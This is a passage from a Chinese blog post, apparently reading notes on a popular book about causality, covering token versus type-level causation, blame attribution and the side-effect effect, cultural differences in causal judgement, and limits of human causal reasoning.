有一些实验表明，参与者对“原因和结果之间是否存在关联机制”的态度会影响他们对事件之间关联性的看法，但如果两个事件的关联性很弱，那么参与者将不会受到影响。

实际上，参与者在对观察序列（比如某些常见的/不常见的症状）进行评估时，可能会把事件之间已知的关联以及存在某种关联的可能性也考虑进去。

6. 因果关系对责任的划分的影响

0x1：实证式因果关系和类级别因果关系

假如你有一台非常考究的咖啡机，这台机器的热度达到萃取温度后只能持续很短的时间，你必须在机器过热之前把咖啡取出来。你的朋友在萃取了一杯咖啡后没有关机器，你去萃取的时候机器已经过热，所以那天早上你没有喝成咖啡。那么问题来了，是谁造成你那天没喝成咖啡？是因为你的朋友没有早点关掉咖啡机？还是因为厂家生产了一台有缺陷、不能重度使用的机器？

这就是因果关系中的归因问题：要确定是谁或者是什么导致了特定的事件。

也就是说，我们想知道的不是一般情况下咖啡机出故障的原因，而是这个案件中的咖啡机为什么会出故障。这与我们分析交通事故中的责任是一类活动。

这种类型的因果关系称为实证式因果关系（as token causality），与类级别因果关系（type-level causality）刚好相反。类级别因果关系指的是一般情况下会出现的情况，比如：

因分心驾驶而导致的交通事故，这属于类级别因果关系
Susie 在开车时发短信结果撞上了 Billy的车，这属于实证式因果关系

关于责任划分和归因问题的研究大多是在哲学领域进行的，但这些研究通常基于直觉或者人们“应该会”有的想法，而不是通过实验收集的数据。比如下面这个例子，

某大学哲学系有一名接待员，她的办公桌装满了笔。行政助理们需要用笔的时候直接从接待员那里拿就可以了，但是教授们则需要自己买笔。但实际上，教授和助理都会从接待员那里拿笔。有一天，一名教授和一名行政助理拿走了接待员手中的最后的两支笔。然后，接待员接到了一通重要的电话，结果却没有笔来记电话中的内容。

现在问题来了，这个情况是谁造成的呢？造成这个后果的责任应该由谁或者主要由谁来承担呢？

对这个问题的讨论涉及到实验哲学和心理学研究的交叉领域，我们本文不做更多讨论，我们还是关注在因果关系推理这个问题上。

0x2：副作用效应

有一种重要的概念叫做“副作用效应（诺布效应）”，它的主要内容是：

如果某个人的行为无意间带来了积极效应，人们不会将这种效应归功于这些行为；
但如果这个人的行为无意间带来了消极效应，那么人们就会认为这些行为是有意的，并且将责任归咎于这些行为的发出者。

举一个例子来说，公司的CEO并不关心他们关于提高利润的最新提案是否对环境有利，他们只关心利润。

结果当环境遭到破坏时，参与者往往会责怪这位CEO；
但是当环境得到改善时，参与者却没有表扬这位CEO。

人们又做了类似的实验并得到了同样的结果：无意间带来了积极效应的行为不会得到表扬，但无意间带来消极效应的行为却会受到批评。心理学家的实验表明，与无意的行为相比，有意的行为更容易成为事件的原因和责任主体。

关于副作用效应的解释有两种：

一种是它取决于人们的行为是否是有意的
另一种是人们的行为是否违反了社会规范

如果你的行为符合社会规范（考试不作弊、不乱扔垃圾等等），那么你不会因为自己的行为而受到褒奖，因为这是正常行为。然后，如果你为了走捷径而踩了一些花草，就会受到责备，因为你的行为违反了社会行为标准。

有证据表明，影响责任判定的因素有很多，比如规范、动机和结果等，然而做出这些判定的过程还在研究当中。尽管近期的研究将责任判定当作了一种包含多个步骤和流程的社会行为，但是绝大部分实验研究还是主要关注结果并致力于理解各种直觉。

7. 文化对因果推断的影响

当有些研究指出“90%的参与者都认为是那个司机引起了这场交通事故”时，这里的参与者指的是什么人？

心理学研究的绝大部分参与者都是西方大学生，因为这个领域的大部分研究工作都是在高校开展的，我们通常都能找到足够的学生参与者。这部分大学生并不能直接代表全社会所有人的共同认知。这就限制了我们所讨论的那些研究成果的普遍适用性。

这个问题涉及到对不同文化背景的参与者对因果关系的感知和判定。

一个重要的文化差异是，参与者认为哪些因素与结果存在因果相关性。如果某个游泳运动员赢得了一次奥运比赛，人们可能会说她之所以能获胜是因为：

参赛运动员的总体实力比较弱
或者是因为她有家人的支持（环境因素）
或者是因为她有游泳天赋（个人禀赋）

这些因素可能都为她的成功做出了贡献，但是差别自在于哪些因素是最重要的。很多研究发现，不同文化背景的人，在看待原因因素重要性方面，存在很多明显的差异。

为了验证这一点，Michael W.Morris 和 Kaiping Peng 分析了汉语报纸和英文报纸上关于同样的一些刑事案件的报道，他们发现：

英文报纸上提到性格因素（比如凶手十分愤怒）的比例要比中文报纸高得多
而中文报纸则往往强调环境因素（比如凶手刚刚失业）

在其他针对东西方文化的对比研究中，人们也发现了同样的现象。

从贝叶斯概率的角度来看这个问题，我们将其解释为：不同文化背景的人，其自身的先验假设是不同的，这些不同的先验假设导致了人们对待事物因果关系的初期判断不一致。但是如果观察量增大，人们对原因因素的后验概率判断会逐渐修正。

8. 因果推断中的人的局限性

尽管目前的AI技术还不十分成熟，我们的一个长远目标是设计出能够像人类一样思考和推理的算法，但是人类思维在很多方面都不如计算机程序，因为计算机程序的运算行为完全是可控的，并且能够完全按照制定好的规则来运行（即可重入性）。

相比之下，虽然人类能够从很少的观察数据中快速找到因果关系，但是我们所找到的因果关系并不总是正确的。

更糟糕的是，前面说到，我们常常会犯一些认知偏见这样的错误，认知偏见会导致我们看不到一些并不存在的相关性，因为我们经常会寻找一些信息来证实自己的信念，或者更重视那些能够证实我摩恩信念的信息。

有些因素让人们很难把握事件发生的原因，比如原因和结果之间存在很长的延迟，或者因果结构很复杂。这些因素要求人们解开很多复杂的关联关系，同时还可能会让事件之间的联系变得模糊。

Relevant Link:

别拿相关当因果！因果关系简易入门 - [美] 萨曼莎 • 克莱因伯格

posted @ 2020-03-10 13:01 郑瀚阅读(2960) 评论(0) 编辑收藏举报

刷新页面返回顶部

Han Zheng, Thinker and Doer

Welcome to contact me. Wechat：LittleHann